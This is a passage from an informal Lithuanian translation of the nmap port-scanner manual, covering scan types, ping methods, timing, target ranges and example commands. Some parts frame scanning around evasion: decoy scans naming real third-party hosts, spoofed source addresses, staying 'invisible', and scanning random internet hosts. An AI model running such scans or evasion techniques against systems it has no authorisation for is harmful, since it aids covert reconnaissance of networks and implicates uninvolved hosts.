reiškia hostas gyvas. Pagal standartą (r00t’ui)

nmap’as naudoja abu ICMP bei ACK metodus. Pakanka­

mai efektyvu, nes vienu metu galite patikrinti #n

hostų.

-sU UDP skanavimas. Naudojamas tam, kad nustatyti kokie

UDP (User Datagram Protocol, RFC 768) portai yra

atviri.

Kai kurie mano, kad UDP skanavimas yra

beprasmiškas, bet jį prisiminti verta vien dėl

vienos Solaris rcpbind skylės. Taip pat yra cDc

Back Orifice trojanas, kuris atsidaro UDP portą ant

window’sų. Gaila tik, kad UDP skanavimas kartais

gali trukti labai ilgai.

-sA ACK skanavimas: šitas metodas paprastai yra naudo­

jamas tam, kad išsiaiškinti firewall’ų (ugnies

sinų) taisykles. Jis gali padėti nustatyti ar fire­

wall’as tikras, ar paprasčiausias paketų filtras,

blokuojantis įplaukiančius SYN paketukus.

-sW Window skanavimas. Šis skanavimo būdas labai

panašus į ACK skaną, skirtumas tik tas, kad šis

skanavimo metodas kartais parodo ir atvirus portus

(ACK jų nerodo).

-sR RPC skanavimas. Praskanavus parodoma kokia programa

ir jos versija laiko RPC portus atvirus.

-b

Dar vienas pakankamai originalus skanavimo būdas,

t.y. pasinaudojant ftp proxy serveriu. formatas gali būti useris:passwor­

das@serveris:portas . Viskas išskyrus serverį yra

nebūtina.

BENDROSIOS OPCIJOS

Nei viena iš šių nėra būtina, bet kai kurios gali

būti pakankamai naudingos

-P0 Skanuoti iš kart, nepabandžius iš pradžių ping’int

serverio. Tai naudinga skanuojant tokius kaip

mail.takas.lt, kurie neatsakinėja į ICMP echo

request’us. Tokiu atveju reikėtų naudoti -P0 arba

-PT80.

-PT Naudoti TCP “ping’ą” vietoje standartinio ICMP

ping’o. Naudinga tokiais atvejais, kai serveris

neatsakinėja i ICMO echo request’us. Taip pat gal­

ima naudoti kartu su postu (-PT).

-PS Naudoja SYN (prisijungimo prašymą) vietoje ACP

-PI Paprastas ping’as + suranda subnet’o broadcast’u

adresus tinkle.

-PB Standartinis ping’inimo metodas: naudoja ACP bei

ICMP ping’us kartu. Geriausia būdas patikrinti

firewall’us, kurie blokuoja vieną iš jų.

-O Viena geriausių nmap’o ypatybių – serverio OS’o

atpažinimas pagal jo fingerprint’us (jei atvirai,

pats nelabai žinau kas per biesas tie finger­

printai).

-I Įjungiamas TCP reverse ident skanavimas. Kaip 1996

Dave’as Goldsmith’as pastebėjo, ident protokolas

(rfc 1413) leidžia pamatyti, kokiam useriui prik­

lauso procesas, kuris naudoja TCP susijungima.

Taigi, tu gali pvz prisijungti prie 80 porto ir

tada pasinaudojes inentd’u, gali pamatyti ar http

serveris yra paleistas root’u ar kokiu kitu

userium.

-f Skanuojant SYN (-sS) , FIN (-sF), XMAS (-sX) arba

NULL (-sN) metodu, naudojami labai mažyčiai sufrag­

mentuoti IP paketai.

-v Verbose mode. Labai rekomenduojama opcija, ypač jei

norit geriau suprasti kas čia dedasi. naudodamas

šią opciją du kartus, efektas bus dar geresnis.

Gali naudoti ir dvigubą -d, efektas – nerealus.

Nepabandęs, nesuprasi.

-h Jei norite kad nedidelis langelis jums trumpai

primintu kelias pagrindines komandas, ši opcija –

jums.

-oN

Viskas, kas vyksta ekrane bus loginama į “logas”

failą.

-oM

Viskas, kas vyksta ekrane bus loginama į failą

“logas” “šiek tiek” kitokiu formatu.

-oS

Logina į failą “logas” kažkokiu nauju s|

Skanavimas, kuris buvo nutrauktas su ^C, gali būti

pratęstas, su sąlyga, kad viskas buvo loginama su

-oN arba -oM opcija. Daugiau jokie parametrai

negali būti pateikti (jie bus tokie, kokie buvo

naudojami loginant). nmap’as pradės skanuoti nuo

sekančios mašinos, po tos, kuri paskutinė buvo

sėkmingai nuskanuota..

-iL

Nuskaito hostus (IP adresus) iš failo “failas”.

Hostai faile turi būti atskirti tarpais, TAB’ais

arba atskirose linijose. deja opcijų nurodyti jokių

negalite tame faile, užtat yra galimybė jas

nurodyti komandinėje eilutėje.

-iR Šita opcija priverčia nmap’ą generuoti atsitik­

tinius hostus. Jei kada neturėsite ką veikti,

pabandykite `nmap -sS -iR -p 80′, kad surastumėte

keletą www serverių.

-p

Galite nurodyti kurį/kuriuos portus tikrinti. pvz.

-p 110 patikrins ar hostas turi pop3 serverį, taip

pat galite mišriai nurodinėti portus:

-p 21,60-90,1243 — 21, visi nuo 60 iki 90

bei 1243 portas

-p 1- — visi portai nuo 1 iki

65535.

-F Greitasis metodas. Skanuoja tik tuos portus, kurie

nurodyti nmap’o services faile (pagal default’ą –

/usr/local/lib/nmap/nmap-services)

-D

Decoy skanavimas priverčia skanuojamą host’ą

manyti, kad jį vienu metu skanuoja visi nurodyti

decoy’iai. Hostų logai gali parodyti 5-10 skanavimų

iš unikalių IP adresų, bet kuris iš jų skanuoja iš

tikro jie pasakyti negalės.

Atskirk kiekvieną decoy’į kableliais (be tarpo) ir

gali tarp jų įterpti ‘ME’ kaip vieną iš decoy’ių.

nmap’as ten įterps tavo adresą. Jei šito

nenurodysi, nmap’as atsitiktinai išrinks tau vietą.

Tiesa, jei ‘ME’ įrašysi 6-oje ar dar vėlesnėje

vietoje, kai kurie skanavimų detektoriai (tokie

kaip Solar Designer’io nepakartojamas scanlog dae­

mon’as) gali tavo IP išviso neparodyti.

Nepamiršk, kad hostai, kuruos naudosi kaip

decoy’ius, turi būti gyvi, kitaip gali už-SYN-

flood’inti taikinį, o be to labai nesunku bus

surasti skanuotoją, jei jis bus vienintelis gyvas

visame tinkle.

Atkreipk dėmesį ir į tai, kad kai kurie (durnesni)

portų skanavimų detektoriai gali aplamai skanuo­

jantiems host’ams uždrausti priėjimą. Įsivaizduok,

kas gali nutikti, jei vieną iš decoy’ių nurodytum

“localhost’ą” 🙂

Decoy skanavimas gali būti naudojamas kartu su ping

(naudojant ICMP, SYN, ACK, ar dar ką nors) arba

tikru portų skanavimu bei bandant surasti remote

OS’ą ( -O ).

-S

Kartais nmap’as gali nerasti jūsų adreso. Tokiu

atveju galite naudoti -S opciją su jūsų IP adresu

bei interfeisu, kuriuo siūsite paketus.

-e

Nurodo nmap’ui kokiu interfeisu siųsti paketus.

(lo, ppp0, eth0 ir etc.)

-g

Nurodo iš kokio porto skanuoti. Daugelis firewall’ų

bei filtrų padaro išimtis DNS (53) bei FTP-DATA

(20) paketams.

-r Nurodo nmap’ui portus skanuoti NE atsitiktine

tvarka.

-M

Nustato naksimalų susijungimu skaičių, kuris bus

naudojamas paralelėje su TCP(standartiškai) skanav­

imu.

LAIKO APRIBOJIMAI

-T

Paranoid – pats lėčiausias skanavimo būdas, Insane

– pats greičiausias, deja ne toks tikslus, ypač jei

tinklas lėtas. Vietoj žodžių galite naudoti ir -T

(0-5), kur 0 == Paranoid, 1 == Sneaky ir t.t.

–host_timeout

Nurodo kiek laiko nmap’as gali skanuoti duotąjį IP.

Laikas turi būti nemažiau nei 200 milisekundžių.

–max_rtt_timeout

Kiek daugiausia laiko nmap’as gali laukti atsakymo

iš skanuojamo IP.

–scan_delay

Nustato minimalų laiko tarpą, kuri nmap’as turi

laukti tarp bandymų. Tai naudingiausia siekiant

sumažinti tinklo apkrovimą.

TAIKINIO NURODYMO BŪDAI

Viskas, kas nėra opcijos, nmap’e suprantama kaip taikinys.

Paprasčiausias būdas yra nurodyti konkrečius IP arba hos­

tus. Jeigu norite nuskanuoti IP adresų subnet’ą, galite

pridėti /maskę hostname’ui ar IP adresui. Maskė turi būti

tarp 0 (norint nuskanuoti visą internetą) ir 32 (norint

nuskanuoti konkretų host’ą/IP. Naudok /24 ‘C’ klasės

adresų skanavimui bei /16 ‘B’ klasės adresų skanavimui.

nmap’as taip pat turi gan patogią galimybę nustatinėti IP

adresus sąrašais/atstumais. pvz. gali nuskanuoti ‘B’ klasę

užrašydamas 128.210.*.* arba 128.210.0-255.0-255 arba dar

128.210.0-50,51-255.1,2,3,4,5-255 . Manau kad tai pakanka­

mai patogu ir nesudėtinga.

KELETAS PAVYZDŽIŲ

nmap -sX -e lo -P0 -S 127.0.0.3 localhost

Pasinaudodamas Xmas Tree skanavimo metodu,

apsimetinėdamas, kad esu 127.0.0.3 Loopback protokolu

skanuoju savo localhost’ą Štai kaip atrodo ipchains’ų

log’as:

Packet log: input DENY lo PROTO=6 127.0.0.3:37009

127.0.0.1:139 L=40 S=0x00 I=53682 F=0x0000 T=41 (#1)

kaip matote, kernelis yra įsitikinęs, kad jį skanuoja iš

127.0.0.3 o tai ir yra vienas svarbiausių uždavinių –

likti nematomiems 🙂

nmap -sS -O target.example.com/24

stealth SYN metodu nuskanuoja visas 255 mašinas, esančias

target.example.com ‘C’ klasėje. Taip pat bando nustatyti

kiekvieno iš jų operacinę sistemą.

host -l company.com | cut ‘-d ‘ -f 4 | ./nmap -v -iL –

suranda visus *.company.com hostus ir atiduoda juos

nmap’ui, kuris savo ruožtu įsijungęs verbose mode visus

juos nuskanuoja.

nmap -sN -D microsoft.com,mail.takas.lt,ME -oN /tmp/crazy

-p 1-1024 -O crazy.com

skanauoja Null skanavimo režimu, panaudoja du decoy

adresus, viską logina į /tmp/crazy failą, skanuoja nuo 1

iki 1024 crazy.com portus bei stengiasi atspėti crazy.com

serverio operacinę sistemą

BUGAI

Vabalėliai? Kokie dar vabalėliai? Na.. jei rasit kokių,

būtinai siūskit autoriui: . Pachai

taip pat labai laukiami. Taip pat nepamirškite siūsti OS’ų

fingerprintus, kad nmap’o autoriai galėtų plėsti duom.

bazę. Apie tai smulkiau galite rasti docs/nmap-finger­

printing-article.txt dokumente arba nmap’o puslapyje:

http://www.insecure.org/nmap

AUTORIUS: Fyodor fyodor@insecure.org

IŠVERTĖ: Aurimas Mikalauskas inner@dammit.lt

PLATINIMAS

Naujausią nmap’o versiją visada galite rasti čia:

http://www.insecure.org/nmap/

nmap is (C) 1997,1998,1999,2000 by Fyodor fyodor@inse­cure.org

libpcap’as yra taip pat platinamas kartu su nmap’u.

Autorines teises į jį turi Van Jacobson, Craig Leres ir

Steven McCanne, visi iš Lawrence Berkeley nacionalinės

Laboratorijos Kalifornijos Universiteto, Berkeley, CA.

Versija platinama su nmap’u gali būti perrašinėjama. Sour­

cus galit parsisiūsti iš ftp://ftp.ee.lbl.gov/libp­cap.tar.Z

PABAIGAI

Džiaugiuosi, kad pagaliau pasiekėte galą. Dabar jau galite

skaityti save kvalifikuotu nmap’o guru.

beje, jei norite ką nors pridėti ar pakeisti šiame doku­

mente, arba (neduok Dieve) radot kokių tai bug’u, rašykit

man adresu, pateiktu sekcijoje išvertė. Šiaip šitas manu­

alas abejoju ar bus atnaujinamas, bet pačią naujausią

nmap-lt-HOWTO visada galite rasti mano puslapyje:

http://ice.dammit.lt/~inner/

37. Paranoja arba kaip neikliuti